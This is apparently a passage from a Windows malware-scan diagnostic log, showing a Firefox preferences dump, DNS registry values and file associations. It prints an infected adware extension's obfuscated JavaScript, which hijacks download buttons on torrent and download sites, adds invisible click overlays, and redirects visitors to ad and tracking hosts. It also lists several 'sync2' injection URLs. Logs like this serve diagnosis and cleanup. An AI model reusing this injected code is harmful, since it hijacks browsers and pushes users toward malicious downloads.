e=n.utils.duplicateElement(h),\nk=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}h=n.utils.query_selector_all(\".play-button\")[0];\"undefined\"!==typeof h&&(e=n.utils.duplicateElement(h),k=h.parentNode,k.insertBefore(e,h),k.removeChild(h));h=n.utils.query_selector_all(\".download.step\")[0];\"undefined\"!==typeof h&&(e=n.utils.duplicateElement(h),k=h.parentNode,k.insertBefore(e,h),k.removeChild(h))}};this[\"myappsforpc.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".download-link\");if(\"undefined\"!==typeof h)for(var e=\n0;e<h.length;e++){var k=n.utils.duplicateElement(h[e]),l=h[e].parentNode;l.insertBefore(k,h[e]);l.removeChild(h[e])}}};this[\"telecharger.logiciel.net\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e],l=k.getAttribute(\"class\");if(null!=l&&-1<l.indexOf(\"action-button download\")){var l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"winmacsofts.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".btn.btn-primary.download-btn\"),\ne=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"telecharger.info\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].getAttribute(\"title\");if(null!=k&&-1<k.indexOf(\"TELECHARGER \")){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"torntv-dl.net\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=\n0;e<h.length;e++){var k=h[e].getAttribute(\"onclick\");if(null!=k&&-1<k.indexOf(\"getDownload\")){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"1337x.to\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/assets//images/1337x-1.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);\nm.removeChild(k.parentNode)}}}};this[\"h33t.to\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&(-1<k.indexOf(\"arrow_green.gif\")||-1<k.indexOf(\"arrow_white.gif\"))||-1<k.indexOf(\"button_direct.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"ahashare.com\"]=new function(){this.init=function(){for(var h=\ndocument.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&(-1<k.indexOf(\"magnit.png\")||-1<k.indexOf(\"noclient.png\"))){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"torrenthound.com\"]=new function(){this.init=function(){var h=document.getElementById(\"direct2\"),e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}};this[\"smartorrent.com\"]=\nnew function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/images/download_FR.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"torrentreactor.net\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".mrg.mrg-fifth\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),\nm=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"tomadivx.org\"]=new function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/imagenes_web/descargar.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"opensubtitles.website\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=\ndocument.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=\nh.children[l],e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(e)}}}};this[\"downloads.info\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e],l=k.getAttribute(\"class\");if(null!=l&&\n-1<l.indexOf(\"action-button download\")){var l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"techypcapps.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techmacho.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techariot.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"androidlegend.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;\nm.insertBefore(l,k);m.removeChild(k)}}};this[\"technologyrush.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"notintricate.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};\nthis[\"techglen.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"updownload.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techamiable.com\"]=new function(){this.init=\nfunction(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"appsforpcmero.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"hugefiles.net\"]=new function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),\ne=0;e<h.length;e++)if(h[e].src.indexOf(\"hugefiles.net/button.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}};this[\"go4up.com\"]=new function(){this.init=function(){setTimeout(function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].src.indexOf(\"download-button.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);\nm.removeChild(k.parentNode)}},1E3)}};this[\"descarga.benjaminstrahs.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download_link.btnDownloadAlt\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"installers.installm.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download_link.btnDownloadAlt\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;\nm.insertBefore(l,k);m.removeChild(k)}}};this[\"uptobox.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".button_upload.green\");1>h.length&&(h=n.utils.query_selector_all(\".button_upload green\"));for(var e=0;e<h.length;e++){var k=h[e].parentNode,l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"torrentz.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=\nh[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"torrentz.eu\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"torrentsmirror.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"isohunt.to\"]=new function(){this.init=function(){var h=document.links;for(i=0;i<h.length;i++)if(\"btn.btn-success.btn-lg\"===h[i].className||\"btn btn-success btn-lg\"===\nh[i].className){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}};this[\"lp.playerpage209.info\"]=new function(){this.init=function(){var h=document.createElement(\"script\");h.text=\"var a = document.getElementById('myModal');a.setAttribute('onclick', 'void(0);');\";n.utils.addScript(h)}};this[\"lp.playerpage214.info\"]=\nnew function(){this.init=function(){var h=document.createElement(\"script\");h.text=\"var a = document.getElementById('myModal');a.setAttribute('onclick', 'void(0);');\";n.utils.addScript(h)}};this.injectHidden=function(){var h=document.createElement(\"input\");h.type=\"hidden\";h.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(h)};if(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==typeof this[location.host]&&this.activeZds[location.host]&&\nwindow.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var v in this.activeZds)if(-1<location.host.indexOf(v)&&1==this.activeZds[v])try{this[v].init(),this.injectHidden()}catch(y){}};}catch(e){};try{if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}}catch(e){};try{(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=rHwKrHCKrTrEvTYEfHw9rTY7qjkHqHY%3D&eid=583&hid=8438959027574575270&pid=21153&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();}catch(e){};try{if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"3\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};}catch(e){}})();");
user_pref("extensions.gCtIfAjhmQt0OUSd.url", "http://safefacile.net/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://simpleguardcompletesun.in/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://sunfuun.com/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://fastgroupchinayour.net/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://solutionprojob.info/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://getjpi.info/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://superve.net/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://superie.org/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://filebestproffiguru.net/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D;http://homewebbnew.us/sync2/?q=hfZ9ofV9CShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjs8qShIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8hB6l9DetVnemcBy0TA7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMg7ZZBM4VBd9EtM0HAen0qTaFtMVKC6n0rjUMgNr0rn%3D%3D");
user_pref("extensions.getAddons.cache.lastUpdate", 1469019400);
user_pref("extensions.getAddons.databaseSchema", 5);
user_pref("extensions.hotfix.lastVersion", "20160128.01");
user_pref("extensions.lastAppVersion", "47.0");
user_pref("extensions.lastPlatformVersion", "47.0");
user_pref("extensions.pendingOperations", false);
user_pref("extensions.shownSelectionUI", true);
user_pref("extensions.systemAddonSet", "{\"schema\":1,\"addons\":{}}");
user_pref("extensions.ui.dictionary.hidden", true);
user_pref("extensions.ui.experiment.hidden", true);
user_pref("extensions.ui.lastCategory", "addons://search/youtube%20mp3");
user_pref("extensions.ui.locale.hidden", true);
user_pref("extensions.xpiState", "{\"app-profile\":{\"{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}\":{\"d\":\"C:\\\\Users\\\\Utilisateur\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\5lvohhu3.default-1422270210674\\\\extensions\\\\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi\",\"e\":true,\"v\":\"2.7.3\",\"st\":1461956463978}},\"app-system-defaults\":{\"e10srollout@mozilla.org\":{\"d\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\e10srollout@mozilla.org.xpi\",\"e\":true,\"v\":\"1.0\",\"st\":1466274986071},\"firefox@getpocket.com\":{\"d\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\firefox@getpocket.com.xpi\",\"e\":true,\"v\":\"1.0.2\",\"st\":1466274986047},\"loop@mozilla.org\":{\"d\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\loop@mozilla.org.xpi\",\"e\":true,\"v\":\"1.3.2\",\"st\":1466274985853}},\"app-global\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"d\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi\",\"e\":true,\"v\":\"47.0\",\"st\":1466274986107}}}");
user_pref("extensions.{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.sdk.baseURI", "resource://b9db16a4-6edc-47ec-a1f4-b86292ed211d/");
user_pref("extensions.{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.sdk.domain", "b9db16a4-6edc-47ec-a1f4-b86292ed211d");
user_pref("extensions.{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.sdk.load.reason", "startup");
user_pref("extensions.{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.sdk.rootURI", "jar:file:///C:/Users/Utilisateur/AppData/Roaming/Mozilla/Firefox/Profiles/5lvohhu3.default-1422270210674/extensions/%7Bb9db16a4-6edc-47ec-a1f4-b86292ed211d%7D.xpi!/");
user_pref("extensions.{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.sdk.version", "5.6.1");

---------- | Active Connections


---------- | DNS

[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
"DhcpNameServer"=192.168.1.254
[HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{BB2C9AD8-1F1A-4CC7-915B-FE07B5415C42}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{E2029CAF-BCF6-4C7A-A372-377F4D4D0EE5}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{656ED1E8-3842-4BB0-8AAF-C7E83D73DF44}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{910901D6-A196-4AD6-A4BB-3EA1BE829235}]
"DhcpNameServer"=192.168.1.254
[HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{BB2C9AD8-1F1A-4CC7-915B-FE07B5415C42}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\ControlSet003\services\Tcpip\Parameters\Interfaces\{656ED1E8-3842-4BB0-8AAF-C7E83D73DF44}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\ControlSet003\services\Tcpip\Parameters\Interfaces\{910901D6-A196-4AD6-A4BB-3EA1BE829235}]
"DhcpNameServer"=192.168.1.254
[HKLM\SYSTEM\ControlSet003\services\Tcpip\Parameters\Interfaces\{BB2C9AD8-1F1A-4CC7-915B-FE07B5415C42}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{656ED1E8-3842-4BB0-8AAF-C7E83D73DF44}]
"DhcpNameServer"=192.168.0.1 8.8.8.8
[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{910901D6-A196-4AD6-A4BB-3EA1BE829235}]
"DhcpNameServer"=192.168.1.254
[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{BB2C9AD8-1F1A-4CC7-915B-FE07B5415C42}]
"DhcpNameServer"=192.168.0.1 8.8.8.8

---------- | Applications

[HKLM\SOFTWARE\Classes\Applications\hl2.exe] : "c:\program files\portal latinloaders.tk\portal\hl2.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\iexplore.exe] : "C:\Program Files\Internet Explorer\iexplore.exe" %1
[HKLM\SOFTWARE\Classes\Applications\MovieMaker.exe] : "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\notepad.exe] : %SystemRoot%\system32\NOTEPAD.EXE %1
[HKLM\SOFTWARE\Classes\Applications\photoviewer.dll] : %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1
[HKLM\SOFTWARE\Classes\Applications\PicasaPhotoViewer.exe] : "C:\Program Files (x86)\Google\Picasa3\PicasaPhotoViewer.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\vlc.exe] : "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file "%1"
[HKLM\SOFTWARE\Classes\Applications\winamp.exe] : "C:\Program Files (x86)\Winamp\winamp.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\WLXPhotoViewer.dll] : "C:\Program Files (x86)\Windows Live\Photo Gallery\WLXPhotoGallery.exe" /LaunchPhotoViewer /v "%1"
[HKLM\SOFTWARE\Classes\Applications\wordpad.exe] : "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\hl2.exe] : "c:\program files\portal latinloaders.tk\portal\hl2.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\iexplore.exe] : "C:\Program Files\Internet Explorer\iexplore.exe" %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\MovieMaker.exe] : "C:\Program Files (x86)\Windows Live\Photo Gallery\MovieMaker.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\notepad.exe] : %SystemRoot%\system32\NOTEPAD.EXE %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\photoviewer.dll] : %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\PicasaPhotoViewer.exe] : "C:\Program Files (x86)\Google\Picasa3\PicasaPhotoViewer.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\vlc.exe] : "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\winamp.exe] : "C:\Program Files (x86)\Winamp\winamp.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\WLXPhotoViewer.dll] : "C:\Program Files (x86)\Windows Live\Photo Gallery\WLXPhotoGallery.exe" /LaunchPhotoViewer /v "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\wordpad.exe] : "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1"

---------- | Svchost - Netsvcs (Whitelisted)

Term -  : 

---------- | Software



[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Ableton]
